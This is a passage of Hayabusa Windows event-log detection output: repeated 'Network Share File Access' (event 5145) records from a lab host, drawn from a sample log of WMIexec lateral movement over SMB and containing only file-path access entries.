+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share 
Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.426 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.426 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.426 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 
+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.443 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.458 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.475 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.491 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.506 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.506 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.506 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.506 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.537 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.553 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.569 